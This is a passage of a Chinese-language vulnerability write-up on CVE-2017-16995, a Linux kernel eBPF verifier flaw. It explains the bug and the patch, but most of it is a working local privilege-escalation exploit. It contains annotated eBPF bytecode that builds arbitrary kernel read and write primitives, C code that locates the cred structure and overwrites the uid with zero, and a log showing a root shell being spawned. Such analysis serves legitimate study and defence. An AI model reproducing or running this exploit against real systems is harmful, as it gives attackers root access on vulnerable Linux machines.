[14]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)            //r1 = r9
[15]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //r2 = r10 = rbp
[16]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc) //r2 = rbp - 4
[17]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x1) //[rbp - 4] = r0
[18]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem)
[19]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) //if(r0 != 0): 函数bpf_lookup_elem成功执行,跳转到指令[13]处执行,否则exit(0)
[20]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
[21]: LDX_MEM_DW(BPF_REG_7, BPF_REG_0, 0x0, 0x0) //r7 = [r0] = map[1]

获取map[2],存储在r8中:

1
2
3
4
5
6
7
8
[22]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)           //r1 = r9
[23]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //r2 = r10 = rbp
[24]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc) //r2 = rbp - 4
[25]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x2) //[rbp - 4] = r0
[26]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0, BPF_FUNC_map_lookup_elem)
[27]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) //if(r0 != 0): 函数bpf_lookup_elem成功执行,跳转到指令[29]处执行,否则exit(0)
[28]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
[29]: LDX_MEM_DW(BPF_REG_8, BPF_REG_0, 0x0, 0x0) //r8 = [r0] = map[2]

任意地址读写

指令[30]~指令[40]由map[0]的值的不同导致以下情况:

  1. 如果r6等于0即map[0] == 0,r3 = map[1];map[2] = r3;由于map[1]可控,因此可以进行任意地址读,将想要泄露的地址写入map[1]中,再读取map[2]的值进行泄露。
  2. 如果r6等于0即map[0] == 1,map[2] = rbp;将rbp写入map[2]中,可以利用map[2]来泄露栈地址。
  3. 如果r6不等于1即map[0] != 1,将map[2]的值写入map[1]指向的地址中,由于map[2]和map[1]我们都可控,可以利用这一分支进行任意地址写。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    [30]: ALU64_MOV_X(BPF_REG_2, BPF_REG_0, 0x0, 0x0)           //r2 = r0 = idx3
    [31]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //r0 = 0
    [32]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x3, 0x0) //if(r6 != 0): 跳转到指令[36]处执行,否则继续执行下一条指令
    [33]: LDX_MEM_DW(BPF_REG_3, BPF_REG_7, 0x0, 0x0) //r3 = [r7]
    [34]: STX_MEM_DW(BPF_REG_2, BPF_REG_3, 0x0, 0x0) //[r2] = r3
    [35]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
    [36]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x2, 0x1) //if(r6 != 1):跳转到指令[39]处执行,否则继续执行下一条指令
    [37]: STX_MEM_DW(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //[r2] = r10 = rbp
    [38]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
    [39]: STX_MEM_DW(BPF_REG_7, BPF_REG_8, 0x0, 0x0) //[r7] = r8
    [40]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)

攻击过程

再看一下实际执行的情况,内核版本是4.4.110,直接使用了p4nda大佬编译的bzImage,文件系统随便用的某一个kernel pwn题的:

1
2
/ $ uname -a
Linux (none) 4.4.110 #1 SMP Thu Oct 11 05:33:12 PDT 2018 x86_64 GNU/Linux

exp分为两部分,一部分为准备工作,创建map,加载eBPF代码以及绑定socket,和前面的sample介绍的流程类似,这里就不再赘述,只贴一下exp的函数调用流程:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
//prepare
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
if (mapfd < 0){
puts("mapfd create error");
exit(0);
}
puts("[+]mapfd finished");

progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

if (progfd < 0)
exit(0);

puts("[+]bpf_prog_load finished");

if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
exit(0);

puts("[+]socketpair finished");

if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
exit(0);

puts("[+]setsockopt finished");

在进行exploit之前,首先介绍在exp中如何进行地址泄露以及任意地址读写,与eBPF指令[30]~[40]对应。首先是任意地址泄露,条件是map[0] = 0,将目标地址写入map[1],读取map[2]进行泄露:

1
2
3
4
5
6
7
//map[0] = 0,map[1] = addr,map[2] = 0
//read target_addr from map[2]
static uint64_t __read(uint64_t addr) {
__update_elem(0, addr, 0); //bpf_update_elem 0~2

return get_value(2); //bpf_lookup_elem 2
}

然后是任意地址写,条件是map[0] != 0,然后将map[2]的值写入map[1]所在的地址中。

1
2
3
4
5
6
//map[0] != 0,write map[2] to map[1]
static void __write(uint64_t addr, uint64_t val) {

__update_elem(2, addr, val);

}

还可以泄露rbp栈指针,条件是map[0] == 1,读取map[2]的值,就是rbp。

1
2
3
4
5
6
7
8
//map[0] = 1,get rbp from map[2]
static uint64_t __get_fp(void) {

__update_elem(1, 0, 0);

return get_value(2);

}

将rbp泄露后,由于Linux将内核态的进程堆栈和线程描述符thread_info这两个部分紧凑的存放在一个单独的区域,这块区域通常为两个页框,thread_info存放在这个内存区的开始,由rbp & ~(0x4000 - 1)获取thread_info的首地址,读取前8个字节即task_struct的地址。

1
2
3
4
5
6
7
8
9
10
//https://elixir.bootlin.com/linux/v4.4.110/source/arch/x86/include/asm/thread_info.h#L55
struct thread_info {
struct task_struct *task; /* main task structure */
__u32 flags; /* low level flags */
__u32 status; /* thread synchronous flags */
__u32 cpu; /* current CPU */
mm_segment_t addr_limit;
unsigned int sig_on_uaccess_error:1;
unsigned int uaccess_err:1; /* uaccess failed */
};

通过这张图可以清晰的看出内核栈与thread_info,task_struct的关系,图来自于《深入理解Linux内核》
3
然后通过cred的偏移获取cred结构体地址,根据uid偏移获取uid的地址,最后将其修改为0进行提权,然后get shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
sp = get_sp(fp);
if(sp < PHYS_OFFSET){
puts("bogus sp");
exit(0);
}

task_struct = __read(sp);
if (task_struct < PHYS_OFFSET){
puts("bogus task ptr");
exit(0);
}

printf("[+]task_struct = %lx\n", task_struct);

credptr = __read(task_struct + CRED_OFFSET); // cred
if (credptr < PHYS_OFFSET){
puts("bogus cred ptr");
exit(0);
}

printf("[+]credptr = %lx\n", credptr);

uidptr = credptr + UID_OFFSET; // uid
if (uidptr < PHYS_OFFSET){
puts("bogus uid ptr");
exit(0);
}

printf("uidptr = %lx\n", uidptr);

__write(uidptr, 0); // set both uid and gid to 0

if (getuid() == 0) {
printf("spawning root shell\n");
system("id");
system("/bin/sh");
exit(0);

}
else{
puts("[-]exploit failed");
exit(0);
}

最后exp执行效果:

1
2
3
4
5
6
7
8
9
10
11
12
/ $ id
uid=1000(pwn) gid=1000 groups=1000
/ $ ./exp
[+]mapfd finished
[+]bpf_prog_load finished
[+]socketpair finished
[+]setsockopt finished
[+]task_struct = 0xffff88000dbc5300
[+]credptr = 0xffff88000d58d780
uidptr = 0xffff88000d58d784
spawning root shell
uid=0(root) gid=0 euid=1000(pwn) egid=1000 groups=1000

修复

漏洞影响版本是Linux Kernel Version 4.14-4.4 (主要影响Debian和Ubuntu发行版),在补丁中,在模拟执行的check_alu_op函数中,对于BPF_ALU64|BPF_MOV|BPF_K类型的指令操作数,将32位的立即数符号扩展为64位;对于BPF_ALU|BPF_MOV|BPF_K类型的指令操作数,0扩展至64位,与真正执行时保持一致。
4
5

参考

[exp] http://cyseclabs.com/exploits/upstream44.c
[exp] http://p4nda.top/2019/01/18/CVE-2017-16995/
[eBPF] https://www.ibm.com/developerworks/cn/linux/l-lo-eBPF-history/index.html
https://xz.aliyun.com/t/2212
http://p4nda.top/2019/01/18/CVE-2017-16995/
https://cert.360.cn/report/detail?id=ff28fc8d8cb2b72148c9237612933c11